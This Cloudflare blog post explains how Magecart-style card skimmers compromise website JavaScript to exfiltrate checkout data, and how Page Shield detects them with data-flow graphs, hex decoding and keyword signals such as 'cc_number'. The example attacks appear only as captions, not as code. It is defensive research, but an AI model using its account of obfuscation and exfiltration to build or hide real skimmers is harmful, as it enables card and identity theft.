Detecting Magecart-Style attacks with Page Shield

During CIO week we announced the general availability of our client-side security product, Page Shield. Page Shield protects websites’ end users from client-side attacks that target vulnerable JavaScript dependencies in order to run malicious code in the victim’s browser. One of the biggest client-side threats is the exfiltration of sensitive user data to an attacker-controlled domain (known as a Magecart-style attack). This kind of attack has impacted large organizations like British Airways and Ticketmaster, resulting in substantial GDPR fines in both cases. Today we are sharing details of how we detect these types of attacks and how we’re going to be developing the product into the future.

How does a Magecart-style attack work?

Magecart-style attacks are generally quite simple, involving just two stages. First, an attacker finds a way to compromise one of the JavaScript files running on the victim’s website. The attacker then inserts malicious code which reads personally identifiable information (PII) being entered by the site’s users, and exfiltrates it to an attacker-controlled domain. This is illustrated in the diagram below.

A diagram showing the steps involved in a Magecart-style attack

Magecart-style attacks are of particular concern to online retailers with users entering credit card details on the checkout page. Forms for online banking are also high-value targets along with login pages and anywhere else where you enter personal details online.

Attackers have a number of routes through which they can compromise a popular library and get their malicious code running on an unknowing vendor’s website, which include:

Compromising third-party providers
Compromising the website itself
Exploiting vulnerabilities

Frequently, the third-party providers themselves get compromised and attackers gain the ability to modify code that’s being distributed to a number of websites; this was the case with the Ibenta breach that compromised Ticketmaster. Alternatively, if attackers gain admin access to the site itself, they can modify one of the scripts being used and insert their malicious code — which happened in 2018 to British Airways. Libraries that have reached their end of life and are no longer maintained by their creators are vulnerable to zero-day exploits. Automated attacks have been seen compromising thousands of checkout pages in one go by taking advantage of this.

What can be done about it?

Application security providers and security teams are able to provide several defense mechanisms for site owners that include:

A diagram showing 6 different possible mitigation strategies

Content Security Policies: Page Shield uses a content security policy (CSP) deployed with a report-only directive to collect information from the browser about the scripts running on an application. That allows us to provide basic visibility to application owners about the files that are running on their site.

Static Analysis: Downloading the script and performing automated analysis on the content using machine learning techniques or databases of handwritten signatures can identify malicious scripts that would otherwise go undetected.

Threat Feeds: Databases of malicious hostnames or URLs are effective at capturing malware we already know about and complement detection capabilities that are targeted at novel attacks.

Subresource Integrity Checks: Application owners can include a cryptographic hash of the files they are loading in the ‘integrity’ attribute of any script or link. This is effective at protecting against unexpected changes at the source by malicious third parties.

External Connection Checks: Extracting a list of external connections being made by each script and comparing these against blocklists and allowlists can help spot malicious exfiltration attempts to attacker-controlled domains.

Page Shield currently leverages CSP reports, threat-intelligence feeds, and ML-based static analysis in order to detect malicious scripts. We think static analysis has an important role to play in the detection of client-side threats with the ability to detect attacks that are unlikely to be found with the other mechanisms.

Some ways we’re doing static analysis

Our static analysis system covers two scenarios:

The code is readable, and its functionality has not been obscured
The functionality of the code has been obscured (with or without malicious intent)

This gives four categories of script to analyze:

Benign scripts
Malicious scripts
Obfuscated or minified benign scripts
Obfuscated malicious scripts

We’ve developed separate models for the two scenarios mentioned above. The first is targeted at detecting ‘clean’ scripts, where the code has not been obscured. The second looks at obfuscated scripts and differentiates between malicious and benign content.

The detection of ‘clean’ malicious scripts relies on an analysis of the script’s data flow properties which are derived from a representation of the script called an abstract syntax tree. Consider the following very simple example script:

A very simple made-up Magecart-style attack

This script has an associated abstract syntax tree (AST), a graph-based representation of the structure of the program, and a key tool in static analysis of malware. The below diagram shows a sample of the AST from the above code snippet.

A diagram showing the abstract syntax tree for our simple example

Page Shield uses a script’s AST to detect whether a significant change has occurred in the structure of the program (triggering a change alert), and also to derive the script’s corresponding data flow graph, which tracks the flow of data between variable assignments and function calls. The figure below shows the raw data flow graph derived from the AST for our simple example.

A diagram showing the data flow graph for our simple example

We have developed an ML model capable of identifying nodes on the graph that relate to PII reads or malicious data exfiltration which produces the likelihoods on the graph shown below. The nodes in blue have been classified as related to PII and those in red as being related to data exfiltration:

A diagram showing node-predictions on the data flow graph for our simple example

A script can be classified as malicious if there’s a connected path on the graph between nodes involved in the reading of PII and nodes that form part of the data exfiltration call to an attacker-controlled domain:

A diagram showing the connected data flow path for our simple example

Models agnostic to the connection between the PII-read and exfiltration call are prone to false positives in scenarios where they are unrelated. Our data-flow based approach allows us to effectively detect attacks while eliminating false positives from disconnected logic.

Malicious actors, however, are usually trying to evade detection, and in order to avoid being spotted will often conceal their attack by encoding and transforming the content beyond recognition. Our second model handles this type of content and is able to differentiate between benign and malicious use of obfuscation.

The below example shows an attack that's been obscured via the inclusion of hex-encoded strings in a list _0xb902 which is subsequently referenced.

An example of an obfuscated Magecart-style attack

Normalizing the content by decoding hex digits on hex-matching substrings reveals a number of JavaScript keywords used as part of the attack.

An example of an obfuscated Magecart-style attack after normalization

The concept of ‘revealed-risk’ — how risky the revealed content is, forms the core of our approach for differentiating between obfuscated malware and legitimate uses of character encoding or minification. For example, revealing keywords like “cc_number” and “stringify” in the above example provides a strong signal that this is an attack.

However, analyzing the revealed risk only works if you can normalize the content. Frequently attackers go far beyond simple character encoding schemes to hide their malicious code. It is common to see custom-defined obfuscation functions in malicious scripts that can apply any arbitrary series of transformations to the input string. For example, consider a potential encoding function:

An example of a function doing arbitrary string encoding

This transforms the string document.getElementById

to 646u63756s656t742t676574456r656s656t7442794964.

The decoding function defined in the script would be:

Normalizing strings that have been through complex transformations requires execution of the code, and so in order to avoid a trivial bypass with an encoding scheme such as the above, our model also detects the presence of malicious, encoded strings that cannot be normalized.

With our approach of analyzing clean and obfuscated content separately, looking for connected paths on the data flow graph, revealed risk or arbitrary string transformations, we’ve been able to detect most attacks that we’ve seen to date. We’re excited to see what we find as we onboard more customers onto Page Shield and will continue to evolve our detection capabilities over time.

What’s next?

We're constantly improving on our models and will be expanding content-based risk-scoring to include other attack types like crypto-mining and adware over the coming months. Enterprise customers can sign up for Page Shield’s enterprise add-on which includes content-based detection of Magecart-style attacks within your sites’ JavaScript dependencies.

The Cloudflare Blog

Detecting Magecart-Style attacks with Page Shield

How does a Magecart-style attack work?

What can be done about it?

Some ways we’re doing static analysis

What’s next?

How we train AI to uncover malicious JavaScript intent and make web surfing safer

A safer Internet with Cloudflare: free threat intelligence, analytics, and new threat detections

Collect all your cookies in one jar with Page Shield Cookie Monitor

Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website